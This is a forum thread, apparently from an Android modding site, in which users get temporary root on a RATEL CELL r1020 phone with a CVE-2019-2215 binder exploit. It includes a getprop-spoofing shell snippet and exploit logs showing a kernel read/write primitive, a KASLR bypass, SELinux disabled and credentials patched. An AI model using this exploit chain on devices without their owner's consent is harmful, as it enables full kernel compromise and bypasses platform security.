Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.

j4nn said:
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Click to expand...
Click to collapse
is that bug when i had activated oem unlock in dev options but cannot unlock with fastboot mode?

j4nn said:
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Click to expand...
Click to collapse
can you help me please?

arifincaesar said:
can you help me please?
Click to expand...
Click to collapse
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.

j4nn said:
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
Click to expand...
Click to collapse
hehe i keep watching your work for exploit sir
if there something new exploit i'll try to my phone
thx before

@arifincaesar, try this please:
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
That should try the offsets defined for xz1c. It's a blind try, but let's see.
Please post the log in a text form (copy it via clipboard from the terminal), using the CODE tags in the message (can be used with the # icon in advanced post).

Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
i can't believe, it work bro i swear :v
is that my phone rooted?

nope i think my phone is not rooted yet..
i check from root checker it say "sorry root access is not properly installed on this device."

@j4nn heres the output
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
Cell:/data/local/tmp # cd
Cell:/ # ls
ls: ./cache: Permission denied
ls: ./init: Permission denied
ls: ./init.environ.rc: Permission denied
ls: ./init.rc: Permission denied
ls: ./init.recovery.qcom.rc: Permission denied
ls: ./init.usb.configfs.rc: Permission denied
ls: ./init.usb.rc: Permission denied
ls: ./init.zygote32.rc: Permission denied
ls: ./init.zygote64_32.rc: Permission denied
ls: ./postinstall: Permission denied
ls: ./ueventd.rc: Permission denied
ls: ./verity_key: Permission denied
acct bt_firmware bugreports charger config d data default.prop dev dsp etc firmware lost+found mnt oem persist proc res root sbin sdcard storage sys system vendor
1|Cell:/ #

@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.

j4nn said:
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
Click to expand...
Click to collapse
hehe thanks for information sir..

@arifincaesar, see PM please...

j4nn said:
@arifincaesar, see PM please...
Click to expand...
Click to collapse
ok sir, thank you very much for helping me.. T_T
pm sent

cve-2019-2215 based temp root exploit for ratel cell r1020
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.

Thread closed per OP request.

MOD ACTION:
Thread reopened per OP's request

j4nn said:
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
Click to expand...
Click to collapse
yes, it work sir thank you so much here is the log
but i think there other problem i will posting it later here
Code:
Cell:/data/local/tmp $ ./bindershellnew
bindershell - temp root shell using CVE-2019-2215, tailored for RATEL CELL R1020
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffd4316e9b00
MAIN: thread_info_ptr = ffffffd471268000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
Cell:/data/local/tmp # uname -a
Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64
Cell:/data/local/tmp #

Hi there sir @j4nn .
I'm yusuv, ratel cell user. I've been following this thread.
And lately seems the exploit works as intended.
The things is, ratel cell not only have the January patch on all the devices. I've tried the exploit and its stuck on the build number prop and it won't go any further.
Afaik, ratel have 2 ROM builds, one patch is January which is you build the exploit for, the other one is May 1, 2018 patch. With also different build number.
On behalf Ratel Cell user with the may patch. I'm here to ask you, is there any way for us with the May patch being able to root our device?
Thanks in advance.

Dear sir @j4nn.
can you help us on how to install custom recovery in Ratel Cell, if you are willing to help, we will be very grateful.